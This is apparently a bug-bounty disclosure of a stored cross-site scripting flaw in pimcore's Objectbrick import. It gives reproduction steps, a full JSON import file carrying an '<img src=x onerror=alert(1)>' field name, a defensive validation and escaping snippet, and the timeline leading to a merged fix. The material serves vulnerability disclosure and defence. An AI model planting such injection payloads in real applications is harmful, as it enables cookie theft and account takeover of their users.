Cross-site Scripting (XSS) - Stored in pimcore/pimcore

Valid

Reported on

Dec 21st 2021


Description

pimcore is vulnerable to Stored Cross-Site Scripting in the name field via the import functionality.

Steps to reproduce:

  1. Navigate to Settings --> Data Objects --> Objectbricks
  2. Save the following data as a JSON file and import it:
{
    "classDefinitions": [],
    "key": null,
    "parentClass": null,
    "implementsInterfaces": null,
    "title": "",
    "group": "",
    "layoutDefinitions": {
        "fieldtype": "panel",
        "layout": null,
        "border": false,
        "name": null,
        "type": null,
        "region": null,
        "title": null,
        "width": 0,
        "height": 0,
        "collapsible": false,
        "collapsed": false,
        "bodyStyle": null,
        "datatype": "layout",
        "permissions": null,
        "childs": [
            {
                "fieldtype": "panel",
                "layout": null,
                "border": false,
                "name": "aa",
                "type": null,
                "region": null,
                "title": "",
                "width": null,
                "height": null,
                "collapsible": false,
                "collapsed": false,
                "bodyStyle": "",
                "datatype": "layout",
                "permissions": null,
                "childs": [
                    {
                        "fieldtype": "numeric",
                        "width": "",
                        "defaultValue": null,
                        "queryColumnType": "double",
                        "columnType": "double",
                        "integer": true,
                        "unsigned": true,
                        "minValue": null,
                        "maxValue": null,
                        "unique": false,
                        "decimalSize": null,
                        "decimalPrecision": null,
                        "name": "<img src=x onerror=alert(1)>",
                        "title": "",
                        "tooltip": "",
                        "mandatory": false,
                        "noteditable": false,
                        "index": false,
                        "locked": false,
                        "style": "",
                        "permissions": null,
                        "datatype": "data",
                        "relationType": false,
                        "invisible": false,
                        "visibleGridView": false,
                        "visibleSearch": false,
                        "defaultValueGenerator": ""
                    },
                    {
                        "fieldtype": "numeric",
                        "width": "",
                        "defaultValue": null,
                        "queryColumnType": "double",
                        "columnType": "double",
                        "integer": true,
                        "unsigned": true,
                        "minValue": null,
                        "maxValue": null,
                        "unique": false,
                        "decimalSize": null,
                        "decimalPrecision": null,
                        "name": "numberOfSeats",
                        "title": "Number Of Seats",
                        "tooltip": "",
                        "mandatory": false,
                        "noteditable": false,
                        "index": false,
                        "locked": false,
                        "style": "",
                        "permissions": null,
                        "datatype": "data",
                        "relationType": false,
                        "invisible": false,
                        "visibleGridView": false,
                        "visibleSearch": false,
                        "defaultValueGenerator": ""
                    },
                    {
                        "fieldtype": "quantityValue",
                        "width": null,
                        "unitWidth": null,
                        "defaultValue": null,
                        "defaultUnit": "4",
                        "validUnits": [
                            "4"
                        ],
                        "decimalPrecision": null,
                        "autoConvert": false,
                        "queryColumnType": {
                            "value": "double",
                            "unit": "varchar(64)"
                        },
                        "columnType": {
                            "value": "double",
                            "unit": "varchar(64)"
                        },
                        "name": "cargoCapacity",
                        "title": "Cargo Capacity",
                        "tooltip": "",
                        "mandatory": false,
                        "noteditable": false,
                        "index": false,
                        "locked": false,
                        "style": "",
                        "permissions": null,
                        "datatype": "data",
                        "relationType": false,
                        "invisible": false,
                        "visibleGridView": false,
                        "visibleSearch": false,
                        "defaultValueGenerator": ""
                    }
                ],
                "locked": false,
                "icon": null,
                "labelWidth": 100,
                "labelAlign": "left"
            }
        ],
        "locked": false,
        "icon": null,
        "labelWidth": 100,
        "labelAlign": "left"
    },
    "generateTypeDeclarations": false
}
  3. You will notice that the XSS alert has been triggered.

Payload

<img src=x onerror=alert(0)>

Impact

This vulnerability can be used to steal users' cookies, leading to full account takeover through their credentials, and to redirect the user to a malicious website.
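As an added defensive illustration (not pimcore's own code or its fix), the following walks an imported definition of the shape shown above, rejects any field "name" that is not a plain identifier, and shows the escaping a display layer needs if such a name is ever inserted into markup. The identifier pattern and the trimmed sample import are assumptions constructed for this example.

```javascript
// Assumed allowed charset for field names: a plain identifier.
const IDENT = /^[A-Za-z][A-Za-z0-9_]*$/;

// Recursively collect every "name" under layoutDefinitions -> childs.
function collectNames(node, acc = []) {
  if (!node || typeof node !== "object") return acc;
  if (typeof node.name === "string") acc.push(node.name);
  for (const child of node.childs || []) collectNames(child, acc);
  return acc;
}

// Return the names that fail the identifier check; an empty list means the
// import carries no field name that could smuggle markup into the admin UI.
function findInvalidNames(definition) {
  return collectNames(definition.layoutDefinitions).filter(n => !IDENT.test(n));
}

// HTML-escape for any place a name is rendered into HTML rather than as text.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// Constructed sample mirroring the report's JSON structure, trimmed to the
// keys this check looks at.
const sampleImport = {
  layoutDefinitions: {
    fieldtype: "panel", name: null, childs: [
      { fieldtype: "panel", name: "aa", childs: [
        { fieldtype: "numeric", name: "<img src=x onerror=alert(1)>" },
        { fieldtype: "numeric", name: "numberOfSeats" },
        { fieldtype: "quantityValue", name: "cargoCapacity" }
      ] }
    ]
  }
};

const invalid = findInvalidNames(sampleImport);
console.log("rejected names:", invalid);
console.log("escaped for display:", invalid.map(escapeHtml));
```

Rejecting the import at validation time is the primary control; escaping on output is the second layer in case a bad name reaches the UI by another path.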

We are processing your report and will contact the pimcore team within 24 hours. 5 months ago
We have contacted a member of the pimcore team and are waiting to hear back 5 months ago
We have sent a follow up to the pimcore team. We will try again in 7 days. 5 months ago
itsfading
5 months ago

Researcher


any updates?

We have sent a second follow up to the pimcore team. We will try again in 10 days. 5 months ago
We have sent a third and final follow up to the pimcore team. This report is now considered stale. 5 months ago
Bernhard Rusch validated this vulnerability 4 months ago
itsfading has been awarded the disclosure bounty
The fix bounty is now up for grabs
Josef Aichhorn
4 months ago

Maintainer


PR is in the queue: https://github.com/pimcore/pimcore/pull/11217

Divesh Pahuja confirmed that a fix has been merged on 3ae96b 4 months ago
Divesh Pahuja has been awarded the fix bounty
Service.php#L228-L249 has been validated